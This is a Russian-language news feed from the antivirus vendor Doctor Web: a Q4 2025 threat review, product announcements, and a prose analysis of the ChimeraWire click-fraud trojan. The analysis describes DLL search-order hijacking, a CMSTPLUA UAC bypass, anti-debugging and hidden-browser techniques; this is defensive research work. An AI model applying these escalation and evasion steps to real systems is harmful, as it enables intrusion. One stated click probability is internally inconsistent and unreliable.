Trojan.BPlug.4268: Детектирование вредоносного компонента браузерного расширения WinSafe. Этот компонент представляет собой сценарий JavaScript, который демонстрирует навязчивую рекламу в браузерах.
Adware.Siggen.33379: Поддельный браузерный блокировщик рекламы Adblock Plus, который устанавливается в систему другими вредоносными приложениями с целью показа рекламы.

Статистика вредоносных программ в почтовом трафике

Наиболее распространенные угрозы в почтовом трафике IV квартала 2025 года

W97M.DownLoader.2938: Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.
Exploit.CVE-2017-11882.123
Exploit.CVE-2018-0798.4: Эксплойты для использования уязвимостей в ПО Microsoft Office, позволяющие выполнить произвольный код.
Trojan.AutoIt.1413: Детектирование упакованной версии троянской программы Trojan.AutoIt.289, написанной на скриптовом языке AutoIt. Она распространяется в составе группы из нескольких вредоносных приложений: майнера, бэкдора и модуля для самостоятельного распространения. Trojan.AutoIt.289 выполняет различные вредоносные действия, затрудняющие обнаружение основной полезной нагрузки.
JS.Phishing.791: Вредоносный сценарий на языке JavaScript, формирующий фишинговую веб-страницу.

Шифровальщики

В IV квартале 2025 года число запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками, увеличилось на 1,15% по сравнению с III кварталом.

Динамика поступления запросов на расшифровку в Службу технической поддержки «Доктор Веб»:

Наиболее распространенные энкодеры IV квартала 2025 года

Trojan.Encoder.35534 — 24,90% обращений пользователей
Trojan.Encoder.41868 — 4,21% обращений пользователей
Trojan.Encoder.29750 — 3,42% обращений пользователей
Trojan.Encoder.26996 — 2,68% обращений пользователей
Trojan.Encoder.30356 — 0,38% обращений пользователей

Сетевое мошенничество

В течение IV квартала 2025 года интернет-аналитики «Доктор Веб» отметили появление новых поддельных сайтов маркетплейсов. Мошенники якобы от имени торговых площадок предлагают потенциальным жертвам сыграть в игру типа «карусель» (аналог рулетки) с шансом получить приз. После нескольких попыток пользователю «везет», но для получения выигрыша от него якобы сначала требуется оплатить доставку, затем страховку, налог и т. д. В некоторых случаях жертве сообщают, что искомый товар отсутствует, и ей предлагают обменять товар на деньги. Однако для их получения необходима оплата «пошлины». Если пользователь соглашается, от него вновь требуют дополнительных платежей в виде страховки, активации некоего счета и т. п.

Пример поддельного сайта маркетплейса, предлагающего «розыгрыш призов»

В базу нерекомендуемых и вредоносных сайтов также были добавлены очередные интернет-ресурсы, на которых мошенники продают несуществующие театральные билеты. На таких сайтах предлагается посетить популярные постановки, в том числе по привлекательным ценам. Однако после оплаты жертвы не получают желаемые билеты и фактически отдают мошенникам деньги.

Один из мошеннических сайтов по продаже несуществующих театральных билетов

Также были обнаружены очередные ресурсы, которые имитируют сайты частных кинотеатров и предлагают приобрести билеты для просмотра фильмов. Никаких билетов после покупки на таких площадках жертвы в итоге не получают.

Поддельный сайт частного кинотеатра

Наши специалисты выявили ряд фишинговых ресурсов, среди которых были поддельные сайты сервиса Steam. С их помощью злоумышленники пытались получить данные учетных записей пользователей, предлагая тем указать логин и пароль для аутентификации.

Фишинговый сайт, который имитирует настоящий интернет-портал Steam и предлагает потенциальной жертве войти в свою учетную запись

Кроме того, мошенники вновь заманивали потенциальных жертв в несуществующие инвестиционные проекты. Один из выявленных сайтов предлагал русскоязычным пользователям в Америке вложить 250$ в проект под названием Federal Invest и «зарабатывать до 90 000 долларов за три месяца». Данный проект якобы был создан в том числе при участии Дональда Трампа.

Мошеннический сайт, предлагающий принять участие в «выгодном инвестиционном проекте»

Другой сайт сообщал о том, что узбекские пользователи имеют возможность получать от 15 00 000 узбекских сум уже в первый месяц после присоединения к рекламируемому проекту, якобы имеющему отношение к крупному холдингу.

Мошеннический сайт, обещающий жителям Узбекистана крупную прибыль от участия в «инвестиционном проекте»

Узнайте больше о нерекомендуемых Dr.Web сайтах

Вредоносное и нежелательное ПО для мобильных устройств

По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в IV квартале 2025 года самыми распространенными Android-угрозами, несмотря на снижение активности, вновь оказались рекламные трояны Android.MobiDash и Android.HiddenAds. На третье место поднялись вредоносные приложения семейства Android.Siggen, которые обладают различной функциональностью. В течение минувших 3 месяцев возросла активность банковских троянов, при этом наибольший рост среди них показали представители семейства Android.Banker.

Наиболее распространенным нежелательным ПО стали программы Program.CloudInject, модифицированные через облачный сервис CloudInject. Среди потенциально опасного ПО наибольшая активность наблюдалась со стороны приложений Tool.NPMod, модифицированных при помощи инструмента NP Manager. Самыми распространенными рекламными программами оказались модули Adware.Adpush, которые разработчики встраивают в Android-программы.

В октябре компания «Доктор Веб» опубликовала сведения об опасном бэкдоре Android.Backdoor.Baohuo.1.origin, внедренном злоумышленниками в модификации мессенджера Telegram X. Вредоносная программа похищает конфиденциальную информацию и позволяет управлять учетной записью жертвы, а также непосредственно контролировать мессенджер, меняя логику его работы.

В течение IV квартала наши вирусные аналитики обнаружили в каталоге Google Play очередные угрозы, среди которых были трояны Android.Joker, которые подписывают пользователей на платные услуги, а также используемые в мошеннических целях вредоносные приложения Android.FakeApp.

Наиболее заметные события, связанные с «мобильной» безопасностью в IV квартале

Рекламные трояны остались самыми распространенными угрозами для Android-устройств
Возросла активность банковских троянов Android.Banker
В сторонних модификациях мессенджера Telegram X был обнаружен опасный бэкдор Android.Backdoor.Baohuo.1.origin
В каталоге Google Play появились новые вредоносные приложения

Более подробно о вирусной обстановке для мобильных устройств в IV квартале 2025 года читайте в нашем обзоре.

Новогодний интерактивный квест от «Доктор Веб» уже стартовал!

Thu, 25 Dec 2025 13:19:03 GMT

Мы с радостью объявляем о запуске традиционного Новогоднего Адвента от «Доктор Веб».

Последняя неделя декабря всегда наполнена суетой и хлопотами. Все успеть поможет интерактивное приключение в городе «Доктор Веб».

Исследуйте карту, посещайте локации и находите полезные призы: от бесплатных лицензий до эксклюзивных скидок. Принять участие в новогоднем квесте может любой желающий. Ознакомьтесь с условиями акции на странице-карте нашего города и отправляйтесь в путешествие по его улицам.

Успехов в поисках!
Отправиться в путешествие

Обновлены сертифицированные дистрибутивы продуктов линейки Dr.Web Enterprise Security Suite в рамках сертификата ФСТЭК России № 3509

Mon, 22 Dec 2025 14:43:36 GMT

Компания «Доктор Веб» сообщает о выпуске обновлений для сертифицированных дистрибутивов программных продуктов комплекса Dr.Web Enterprise Security Suite. Нами была пройдена процедура инспекционного контроля по сертификату соответствия ФСТЭК России № 3509, сам сертификат соответствия остается действующим на ранее установленных условиях. Обновленные дистрибутивы и эксплуатационная документация, включая формуляр, уже доступны для загрузки в Мастере скачиваний.

Инспекционный контроль подтвердил соответствие линейки сертифицированных продуктов Dr.Web Enterprise Security Suite требованиям нормативных правовых актов Российской Федерации в области защиты информации.

Напоминаем, что сертифицированные ФСТЭК России продукты Dr.Web предназначены для использования в организациях с повышенными требованиями к уровню информационной безопасности и соответствуют требованиям регуляторов в части применения средств антивирусной защиты.

Поставки лицензий на сертифицированные продукты Dr.Web сопровождаются полным комплектом сертификационных материалов.

Обновлено лицензионное соглашение к продукту Dr.Web FixIt!

Mon, 15 Dec 2025 15:18:12 GMT

Мы обновили лицензионное соглашение к продукту Dr.Web FixIt!. С документом можно ознакомиться по ссылке https://license.drweb.ru/agreement/.

Dr.Web FixIt! необходим для детального анализа безопасности рабочих станций и серверов под управлением ОС Windows, и устранения выявленных вирусных угроз и потенциальных уязвимостей. Его ключевое преимущество в том, что он может выявлять новейшее вредоносное ПО и программы, используемые для целевых атак, которые не определяются другими инструментами кибербезопасности.

В первую очередь Dr.Web FixIt! предназначен для специалистов, которые проводят мониторинг безопасности компьютерной инфраструктуры и анализируют киберинциденты. Тем не менее, даже при отсутствии в компании специализированной SOC-команды, решение способно как диагностировать угрозу на рабочей станции и/или сервере, так и произвести лечение после обнаружения.

В случае необходимости специалисты «Доктор Веб» помогут проанализировать информацию, полученную с помощью Dr.Web FixIt!. Для этого необходимо приобрести сертификат на экспертное сопровождение задачи.

Dr.Web FixIt! находится в едином реестре российских программ для ЭВМ и БД. Приобрести решение можно у партнеров «Доктор Веб».

Крупное обновление сервера централизованного управления для Dr.Web Enterprise Security Suite и Dr.Web Industrial

Fri, 12 Dec 2025 11:13:26 GMT

Компания «Доктор Веб» выпускает масштабное обновление для сервера в составе Dr.Web Enterprise Security Suite и Dr.Web Industrial 13.0.1.202511120. Оно будет доступно для загрузки с 15 декабря 2025 года. Ключевое изменение — расширение возможностей компонента «Контроль приложений», что поможет существенно усилить защиту пользователей.

В пакет обновлений мы добавили новые возможности и улучшения. В частности, для пользователей линейки продуктов Dr.Web Enterprise Security Suite и Dr.Web Industrial был расширен список критериев функционального анализа:

В категории «Запуск приложений» появились запреты на запуск дочерних процессов офисными программами и почтовыми клиентами. Это снижает риск заражения через вредоносные документы и письма, не мешая обычной работе пользователей.
В категории «Запуск скриптовых интерпретаторов» добавлены новые правила, позволяющие блокировать запуск сценариев из офисных приложений и почтовых клиентов, а также ограничивать выполнение скриптов AutoIt, а также Java и Python. Такие ограничения защищают от злоупотребления интерпретаторами, которые часто используются при кибератаках, а также при выполнении нежелательных автоматизаций.
В категорию «Загрузка драйверов» включен запрет на установку драйверов без WHQL подписи, что помогает предотвратить использование неподписанных модулей и загрузку потенциально опасного кода в ядро системы.

Обновленный набор правил дает администраторам средств защиты более гибкие инструменты для предотвращения вредоносной активности и повышения устойчивости инфраструктуры к современным угрозам.
Также мы избавились от ряда выявленных ранее проблем. Среди них:

исправлена ошибка, которая могла возникнуть при обновлении ПО Сервера Dr.Web под ОС Windows в условиях ограниченных вычислительных ресурсов;
исправлена ошибка, из-за которой при выборе настройки «Обновлять только базы» в разделе Центра управления «Ограничения обновлений» не обновлялся продукт репозитория «Базы контент-фильтров для UNIX»;
исправлена логика обновления кеша ответов DNS-сервера.

Подробный перечень исправлений вы сможете прочитать в этом документе.

Беллерофонту такое и не снилось. Троян ChimeraWire накручивает популярность сайтов, искусно притворяясь человеком

Mon, 08 Dec 2025 07:00:00 GMT

Скачать PDF

8 декабря 2025 года

Введение

В ходе анализа одной из партнерских программ специалисты компании «Доктор Веб» обнаружили уникальное ВПО с функциональностью кликера, получившее наименование Trojan.ChimeraWire. Оно работает на компьютерах под управлением ОС Windows и основано на проектах с открытым исходным кодом zlsgo и Rod для автоматизированного управления веб-сайтами и веб-приложениями.

Trojan.ChimeraWire позволяет злоумышленникам имитировать действия пользователей и накручивать поведенческий фактор веб-сайтов, искусственно поднимая их рейтинг в выдаче поисковых систем. Для этого вредоносная программа выполняет поиск нужных интернет-ресурсов в системах Google и Bing, после чего открывает их. Она также имитирует действия пользователей, самостоятельно нажимая на ссылки на загруженных сайтах. Троян совершает все вредоносные действия через браузер Google Chrome, который он скачивает с определенного ресурса и запускает в скрытом режиме отладки по протоколу WebSocket.

Trojan.ChimeraWire попадает на компьютеры в результате работы нескольких вредоносных программ-загрузчиков. Они используют различные техники повышения привилегий на основе эксплуатации уязвимостей класса DLL Search Order Hijacking, а также антиотладочные приемы с целью избежать обнаружения. Наша антивирусная лаборатория отследила как минимум 2 цепочки заражения с их участием. В одной из них центральное место занимает вредоносный скрипт Python.Downloader.208, а в другой — вредоносная программа Trojan.DownLoader48.61444, которая по принципу работы схожа с Python.Downloader.208 и фактически выступает его альтернативой.

В данном исследовании мы рассмотрим особенности Trojan.ChimeraWire и вредоносных программ, которые доставляют его на устройства пользователей.

Первая цепочка заражения

Схема, иллюстрирующая первую цепочку заражения

Первая цепочка начинается с трояна Trojan.DownLoader48.54600. Он проверяет, не работает ли в искусственной среде, и завершает работу, если обнаруживает признаки виртуальной машины или режима отладки. Если таких признаков нет, троян скачивает с C2-сервера ZIP-архив python3.zip. В нем находится вредоносный Python-скрипт Python.Downloader.208, а также необходимые для его работы вспомогательные файлы — в частности, вредоносная библиотека ISCSIEXE.dll (Trojan.Starter.8377). Trojan.DownLoader48.54600 распаковывает архив и запускает скрипт. Тот является второй ступенью заражения и представляет собой загрузчик, который скачивает с C2-сервера следующую стадию.

Поведение Python.Downloader.208 зависит от того, какими правами он обладает при запуске. Если скрипт запущен без прав администратора, он пытается их получить. Для этого извлеченный вместе с ним Trojan.Starter.8377 копируется в каталог %LOCALAPPDATA%\Microsoft\WindowsApps. Кроме того, создается скрипт runs.vbs, который в дальнейшем будет использован для повторного запуска Python.Downloader.208.

Далее Python.Downloader.208 запускает системное приложение %SystemRoot%\SysWOW64\iscsicpl.exe. Из-за наличия в нем уязвимости класса DLL Search Order Hijacking оно автоматически загружает троянскую библиотеку ISCSIEXE.dll, имя которой совпадает с именем легитимного компонента ОС Windows.

В свою очередь, Trojan.Starter.8377 запускает VBS-скрипт runs.vbs, и тот повторно исполняет Python.Downloader.208 — уже с правами администратора.

При запуске с необходимыми привилегиями Python.Downloader.208 скачивает с C2-сервера защищенный паролем архив onedrive.zip. В нем находится следующая стадия заражения — вредоносная программа Trojan.DownLoader48.54318 в виде библиотеки с именем UpdateRingSettings.dll — и необходимые для ее работы вспомогательные файлы (например, легитимное приложение OneDrivePatcher.exe из ОС Windows с действительной цифровой подписью, относящееся к ПО OneDrive).

После распаковки архива Python.Downloader.208 создает задачу в системном планировщике на запуск программы OneDrivePatcher.exe при старте системы. Далее он запускает это приложение. Из-за наличия в нем уязвимости DLL Search Order Hijacking оно автоматически загружает вредоносную библиотеку UpdateRingSettings.dll, имя которой совпадает с именем компонента ПО OneDrive.

Получив управление, Trojan.DownLoader48.54318 проверяет, не работает ли он в искусственной среде. При обнаружении одного из признаков работы в виртуальной машине или в режиме отладки он прекращает работу.

Если такие признаки не обнаруживаются, троянская библиотека пытается скачать с C2-сервера полезную нагрузку, а также ключи шифрования для ее расшифровки.

Расшифрованная полезная нагрузка представляет собой ZLIB-контейнер, внутри которого находится шеллкод и исполняемый файл. После расшифровки контейнера Trojan.DownLoader48.54318 пытается распаковать его. Если это не удается, то троян самоудаляется, а сам процесс завершает работу. В случае успеха управление передается шеллкоду, задача которого — разжать идущий вместе с ним исполняемый файл. Данный файл является последней стадией заражения — целевым трояном Trojan.ChimeraWire.

Вторая цепочка заражения

Вторая цепочка начинается с вредоносной программы Trojan.DownLoader48.61444. При запуске она проверяет наличие прав администратора и при их отсутствии пытается их получить. Троян использует технику Masquerade PEB для обхода системы защиты, маскируясь под легитимный процесс explorer.exe.

Затем он вносит патч в копию системной библиотеки %SystemRoot%\System32\ATL.dll. Для этого Trojan.DownLoader48.61444 считывает ее содержимое, добавляет в нее расшифрованный байт-код и путь до своего файла, после чего сохраняет модифицированную версию в виде файла dropper в той же директории, где он расположен. Далее троян инициализирует объекты COM-модели оболочки Windows для сервиса %SystemRoot%\System32\wbem и измененной библиотеки. Если инициализация проходит успешно, Trojan.DownLoader48.61444 пытается получить права администратора через использование COM-интерфейса CMSTPLUA, эксплуатируя уязвимость, характерную для некоторых старых COM-интерфейсов.

В случае успеха модифицированная библиотека dropper копируется в каталог %SystemRoot%\System32\wbem в виде файла ATL.dll. После этого Trojan.DownLoader48.61444 запускает системную оснастку управления WMI WmiMgmt.msc. В результате происходит эксплуатация уязвимости DLL Search Order Hijacking в системном приложении mmc.exe, которое автоматически загружает библиотеку %SystemRoot%\System32\wbem\ATL.dll с патчем. Она, в свою очередь, повторно запускает Trojan.DownLoader48.61444, но уже с правами администратора.

Схема работы Trojan.DownLoader48.61444 при отсутствии прав администратора

При запуске от имени администратора Trojan.DownLoader48.61444 исполняет несколько PowerShell-скриптов для скачивания полезной нагрузки с C2-сервера. Одним из загружаемых объектов является ZIP-архив one.zip. В нем находятся файлы, аналогичные файлам из архива onedrive.zip из первой цепочки (в частности, легитимная программа OneDrivePatcher.exe и вредоносная библиотека UpdateRingSettings.dll — Trojan.DownLoader48.54318).

Trojan.DownLoader48.61444 распаковывает архив и в системном планировщике создает задачу на автозапуск OneDrivePatcher.exe при загрузке системы. Троян также непосредственно запускает это приложение. Так же, как и в первой цепочке, при запуске в OneDrivePatcher.exe происходит эксплуатация уязвимости DLL Search Order Hijacking и автоматическая загрузка троянской библиотеки UpdateRingSettings.dll. Далее цепочка заражения повторяет первый сценарий.

При этом Trojan.DownLoader48.61444 скачивает и второй ZIP-архив: two.zip. В нем находится вредоносный скрипт Python.Downloader.208 (update.py), а также файлы, необходимые для его запуска. Среди них — Guardian.exe — переименованный консольный интерпретатор языка Python pythonw.exe.

После распаковки архива Trojan.DownLoader48.61444 создает в системном планировщике задачу на автозапуск Guardian.exe при загрузке системы. Кроме того, он непосредственно исполняет через это приложение вредоносный скрипт Python.Downloader.208.

Частично дублируя первую цепочку заражения, злоумышленники, по всей видимости, стремились повысить вероятность успешной загрузки Trojan.ChimeraWire в целевые системы.

Схема работы Trojan.DownLoader48.61444 с правами администратора

Trojan.ChimeraWire

Trojan.ChimeraWire получил свое имя на основе сочетания слов «chimera» (в переводе с англ. «химера» — мифическое существо с частями тел нескольких животных) и «wire» (в переводе с англ. «провод»). Слово «chimera» описывает гибридную природу применяемых злоумышленниками методик: использование троянов-загрузчиков, написанных на разных языках, а также антиотладочные техники и эскалация привилегий в процессе заражения. Кроме того, оно отражает то, что троян представляет собой комбинацию различных фреймворков, плагинов и легального ПО, через которое осуществляется скрытое управление трафиком. Отсюда вытекает второе слово «wire»: оно отсылает к невидимой и вредоносной работе трояна с сетью.

Попадая на целевой компьютер, Trojan.ChimeraWire скачивает со стороннего сайта ZIP-архив chrome-win.zip с браузером Google Chrome для ОС Windows. Отметим, что на этом ресурсе также хранятся архивы со сборками Google Chrome и для других систем, таких как Linux и macOS — в том числе для различных аппаратных платформ.

Сайт с различными сборками браузера Google Chrome, откуда троян загружает необходимый архив

После скачивания браузера Trojan.ChimeraWire пытается незаметно установить в него расширения NopeCHA и Buster, предназначенные для автоматизированного распознавания капчи (CAPTCHA). Данные расширения будут в дальнейшем использоваться трояном в процессе его работы.

Далее он запускает браузер в режиме отладки без видимого окна, что позволяет выполнять вредоносную деятельность, не привлекая внимания пользователя. После этого происходит подключение к выбранному автоматически порту отладки по протоколу WebSocket.

Вслед за этим троян переходит к получению заданий. Он отправляет запрос на C2-сервер и получает в ответ base64-строку, в которой скрыта зашифрованная алгоритмом AES-GCM конфигурация в формате JSON.

Пример конфигурации, которую трояну передает C2-сервер

В ней находятся задания и связанные с ними параметры:

целевая поисковая система (поддерживаются системы Google и Bing);
ключевые фразы для поиска сайтов в заданной поисковой системе и их последующего открытия;
максимальное количество последовательных переходов по веб-страницам;
случайные распределения для выполнения автоматических кликов на веб-страницах;
время ожидания загрузки страниц;
целевые домены.

Для дополнительной имитации деятельности реального человека и обхода систем, отслеживающих постоянную активность, в конфигурации также предусмотрены параметры, отвечающие за паузы между сессиями работы.

Имитация кликов мышью пользователем

Trojan.ChimeraWire способен выполнять клики следующих видов:

для навигации по поисковой выдаче;
для открытия найденных релевантных ссылок в новых фоновых вкладках.

Вначале Trojan.ChimeraWire через нужную поисковую систему выполняет поиск сайтов по доменам и ключевым фразам, указанным в конфигурации. Далее он открывает полученные в поисковой выдаче сайты и находит на них все HTML-элементы, которые определяют гиперссылки. Троян помещает их в массив данных и перемешивает его, чтобы объекты в нем располагались в последовательности, отличной от последовательности на веб-странице. Это делается для обхода антибот-защиты сайтов, которая может отслеживать порядок нажатий.

Затем Trojan.ChimeraWire проверяет, работоспособны ли найденные ссылки и совпадают ли строки в них с заданным шаблоном из конфигурации, после чего подсчитывает общее количество совпадений. Дальнейшие действия трояна зависят от получившегося числа.

Если на странице было выявлено достаточное количество подходящих ссылок, Trojan.ChimeraWire сканирует страницу и сортирует найденные ссылки по релевантности (наиболее соответствующие ключевым словам ссылки идут первыми). После этого выполняется клик по одной или нескольким подходящим ссылкам.

Если же совпадений с заданным шаблоном недостаточно или их нет вовсе, вредоносная программа использует алгоритм с вероятностной моделью поведения, который максимально имитирует действия настоящего пользователя. На основе параметров из конфигурации при помощи взвешенного случайного распределения Trojan.ChimeraWire определяет количество ссылок, по которым необходимо перейти. Например, распределение ["1:90", "2:10"] означает, что Trojan.ChimeraWire кликнет 1 ссылку с вероятностью 90%, и 2 ссылки — с вероятностью 20%. Таким образом, с большой долей вероятности вредоносная программа должна перейти по одной ссылке. Троян случайным образом выбирает ссылку из составленного ранее массива и выполняет клик.

После каждого перехода по ссылке из поисковой выдачи и выполнения кликов на загружаемой странице троян, в зависимости от задачи, возвращается на предыдущую вкладку или переходит к следующей. Алгоритм действий повторяется до тех пор, пока не будет исчерпан лимит по кликам для целевых веб-сайтов.

Ниже представлены примеры сайтов, параметры для взаимодействия с которыми поступали трояну в заданиях от C2-сервера:

Подробные технические описания трояна ChimeraWire и вредоносных программ, участвующих в его загрузке, находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».

Подробнее о Trojan.ChimeraWire
Подробнее о Trojan.DownLoader48.54600
Подробнее о Trojan.Starter.8377
Подробнее о Python.Downloader.208
Подробнее о Trojan.DownLoader48.54318
Подробнее о Trojan.DownLoader48.61444

Заключение

В настоящее время вредоносная деятельность Trojan.ChimeraWire фактически сводится к выполнению относительно простых задач кликера по накрутке популярности веб-сайтов. Вместе с тем, функциональные возможности лежащих в его основе утилит позволяют трояну решать более широкий спектр задач — в том числе совершать автоматизированные действия под видом активности настоящих пользователей. Так, с его помощью злоумышленники могут заполнять веб-формы — например, на сайтах, проводящих опросы в рекламных целях. Кроме того, они могут использовать его для считывания содержимого веб-страниц и создания их скриншотов — как с целью кибершпионажа, так и для автоматического сбора информации для наполнения различных баз данных (например, с почтовыми адресами, номерами телефонов и т. п.).

Таким образом, в будущем возможно появление новых версий Trojan.ChimeraWire, где эти и другие функции будут реализованы в полной мере. Специалисты компании «Доктор Веб» продолжают следить за развитием этого трояна.

MITRE ATT&CK®

Мы проанализировали Trojan.ChimeraWire по фреймворку MITRE ATT&CK®, который представляет собой матрицу с описанием тактик и техник киберпреступников, атакующих информационные системы. В результате были выявлены следующие ключевые техники:

Этап	Техника
Выполнение	Выполнение с участием пользователя (T1204) Вредоносный файл (T1204.002) Вредоносная библиотека (T1204.005) PowerShell (T1059.001) Командная оболочка Windows (T1059.003) Visual Basic (T1059.005) Python (T1059.006) Планировщик заданий Windows (T1053.005)
Закрепление	Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001) Запланированная задача / задание (T1053)
Повышение привилегий	Перехват потока исполнения: перехват поиска DLL (T1574.001) Обход контроля учетных записей (T1548.002)
Предотвращение обнаружения	Зашифрованный / закодированный файл (T1027.013) Уклонение от отладки (T1622) Скрытое окно (T1564.003) Исключения для файла или пути (T1564.012) Деобфускация / декодирование файлов или данных (T1140) Перехват потока исполнения: перехват поиска DLL (T1574.001)
Организация управления	Двусторонняя связь (T1102.002) Веб-протоколы (T1071.001)

Индикаторы компрометации

Черная пятница: скидка 40% на комплексную защиту Dr.Web

Wed, 26 Nov 2025 03:34:15 GMT

С 26 ноября по 3 декабря 2025 года вы можете приобрести антивирусную защиту для компьютеров и мобильных устройств со скидкой 40%.

Сезон распродаж — время не только выгодных покупок, но и активности киберпреступников. В этот период растет число фишинговых атак, вредоносных приложений и попыток кражи платежных данных.
Решения Dr.Web помогут вам оставаться в безопасности!

Акция распространяется на:

Dr.Web Security Space — защита персональных компьютеров

блокирует вредоносные программы и шпионское ПО
защищает онлайн‑платежи и конфиденциальные данные
фильтрует фишинговые письма и предупреждает о мошеннических сайтах
не замедляет работу устройств

Dr.Web Security Space для мобильных устройств — защита мобильных устройств, планшетов, Smart TV и игровых консолей

непрерывно защищает от всех типов вредоносных программ
блокирует нежелательные звонки и СМС-спам
обеспечивает безопасность персональных данных, банковских операций и онлайн-покупок

Срок проведения акции: 26 ноября — 3 декабря 2025 года

Dr.Web CureIt! теперь видит то, что пытается скрыть вредоносное программное обеспечение

Thu, 20 Nov 2025 07:40:49 GMT

Компания «Доктор Веб» выпустила обновление для бесплатной утилиты Dr.Web CureIt!, наделив её уникальной функцией — возможностью проверять файлы и папки, внесённые вирусописателями в список исключений антивирусных программ. Это серьёзный шаг в борьбе со сложными угрозами, которые целенаправленно отключают системы защиты для беспрепятственной работы в системе.

Новая функция стала прямым следствием успешной работы другого продукта компании — Dr.Web FixIt!, применяемого специалистами компании для расследования инцидентов и лечения сложных заражений. Многие вредоносные программы, попав на компьютер, первым делом пытаются внести собственные исполняемые файлы в список исключений антивирусной защиты, что делает систему уязвимой: антивирусное ПО, будучи обманутым, игнорирует вредоносные объекты, позволяя злоумышленникам беспрепятственно красть данные, шифровать файлы или использовать ресурсы компьютера в бот-сетях.

Как работает новая функция:

При запуске проверки Dr.Web CureIt! теперь автоматически считывает и анализирует списки исключений установленного или встроенного антивируса.
Все файлы и папки, найденные в этих списках, подвергаются тщательной проверке с помощью антивирусного ядра Dr.Web.
Если в исключениях обнаруживается вредоносный объект, Dr.Web CureIt! уведомляет пользователя и удаляет угрозу.

Это нововведение критически важно для обычных пользователей, которые могут не подозревать, что их система защиты была скомпрометирована. Теперь, даже если вирус попытается спрятаться «на виду», Dr.Web CureIt! сможет его найти и обезвредить.

Планы на будущее: скорая экспертная помощь для Linux

Опираясь на успешный опыт применения сервиса Dr.Web FixIt! для Windows, «Доктор Веб» также готовится к выпуску полноценной версии сервиса для Linux, который нацелен на помощь ИБ-специалистам в расследовании кибератак на корпоративную инфраструктуру.
Сейчас вы можете использовать утилиту Dr.Web FixIt! для Linux для отправки информации о системе в нашу техническую поддержку. Утилита теперь расположена на новой странице - https://free.drweb.ru/sysinfo/
В дальнейшем, наработки, полученные в этой версии, позволят создать утилиту Dr.Web CureIt! и для обычных пользователей, которые смогут быстро проверить и вылечить свои ПК под управлением Linux от последствий заражения.

Скачать обновлённую версию Dr.Web CureIt! можно бесплатно* на официальном сайте: https://free.drweb.ru/download+cureit+free/

*Бесплатно только для персонального использования.

Защитите близких от телефонных аферистов с новой функцией «Антимошенник»

Tue, 18 Nov 2025 08:43:56 GMT

В приложении для безопасности детей и взрослых в цифровом пространстве Dr.Web Family Security появилась новая функция «Антимошенник», которая эффективно защищает от телефонных мошенников и предотвращает шантаж.

Как работает «Антимошенник»

Помогает держать руку на пульсе. Вы, как администратор – глава семьи, можете установить лимит времени для звонков со скрытых и незнакомых номеров. Например, всего 1 минуту. Этого достаточно, чтобы сказать «алло», но слишком мало для манипуляций и выуживания информации.
Обрывает атаки мошенников на старте. Чем короче разговор, тем меньше шансов у злоумышленника втереться в доверие и получить коды из смс, данные карты или пароли. Вы лишаете их главного оружия — времени.
Позволяет не упустить важное. Если важный звонок попал под фильтр, просто добавьте номер в «Список разрешенных» – и звонки с этого номера вы сможете принимать без ограничений. Полный контроль без потери связи.

Также в этом релизе мы повысили стабильность работы приложения и провели внутреннюю оптимизацию.
Обновленная версия Dr.Web Family Security уже доступна в Google Play и скоро будет доступна на официальном сайте drweb.ru и в магазинах приложений RuStore и AppGallery. Следите за обновлениями!

Выпущено обновление серверов централизованного управления Dr.Web Enterprise Security Suite и Dr.Web Industrial

Fri, 07 Nov 2025 09:00:00 GMT

Вышло обновление серверов Dr.Web Enterprise Security Suite и Dr.Web Industrial. Новая версия включает улучшения стабильности и новые инструменты централизованного управления действиями при обнаружении угроз на устройствах под управлением Android. Для получения всех преимуществ и корректной работы системы пользователям рекомендуется обновить серверы до актуальной версии.

В новой версии сервера Dr.Web Enterprise Security Suite реализованы изменения, направленные на повышение управляемости системы защиты. Также изменения произошли и в рамках продукта для защиты мобильных устройств под управлением ОС Android, что обеспечивает полноценный контроль антивирусной защиты со стороны Центра управления.

Данное обновление добавляет возможность централизованно управлять действиями компонентов Сканер и SpIDer Guard при обнаружении различных типов угроз на устройствах под управлением ОС Android. Теперь администратор может задать, как агент Dr.Web будет реагировать на угрозы — уведомлять, удалять или игнорировать их в зависимости от категории.

Настройки, ранее представленные как параметры «Проверять на наличие рекламных программ» и «Проверять на наличие потенциально опасных программ», заменены новым механизмом выбора действий. Если эти проверки были отключены, после обновления по умолчанию к соответствующим программам будет применяться действие «Игнорировать». В остальных случаях используется действие «Сообщать».

Важно для пользователей

Чтобы воспользоваться всеми возможностями новой версии и обеспечить корректную работу компонентов защиты, необходимо обновить серверы централизованного управления до актуальной версии.
Обновление доступно для загрузки через веб-интерфейс консоли управления.
При возникновении вопросов по настройке или планированию обновления администраторы антивирусных сетей могут обратиться за консультацией в Службу технической поддержки.

Обновленная версия Dr.Web для мобильных устройств с умной системой защиты

Fri, 07 Nov 2025 09:00:00 GMT

Вышел релиз антивирусных продуктов для защиты смартфонов, планшетов и других устройств на базе ОС Android. Основные улучшения касаются автоматизации защиты и стабильности работы.

Что делает этот релиз особенным

Новая функция автоматической обработки угроз, которая позволяет решениям Dr.Web удалять вредоносные объекты, блокировать подозрительные ссылки или изолировать потенциально опасные приложения без задержек и ручного вмешательства пользователя.

Что это значит для пользователей

Теперь у пользователей персональных устройств нет необходимости следить за всеми уведомлениями об угрозах, как раньше, потому что можно полностью исключить ручное реагирование. Это сделано для того, чтобы реакция антивирусного продукта не зависела от ответа пользователя на уведомления системы об обнаруженных угрозах и действиях с ними. Интеллектуальная система, разработанная специалистами «Доктор Веб», самостоятельно устраняет угрозы в режиме реального времени в соответствии с заданными параметрами реагирования на те или иные типы вредоносного ПО.
Особенно порадует это решение корпоративных пользователей. Автоматическое удаление вредоносных объектов, блокировка подозрительных ссылок и многие другие действия происходят мгновенно без непосредственного участия администраторов. Функция также поддерживается и со стороны Центра управления.

Администрирование стало еще удобнее

Важное уведомление!

Начиная с новой версии прекращается поддержка Android ОС версии 4.4. Просьба обратить на это внимание при обновлении.

Если вы используете версию Dr.Web Security Space для мобильных устройств, скачанную с официального сайта «Доктор Веб», для обновления необходимо полностью переустановить приложение — скачайте последнюю версию агента и установите ее.

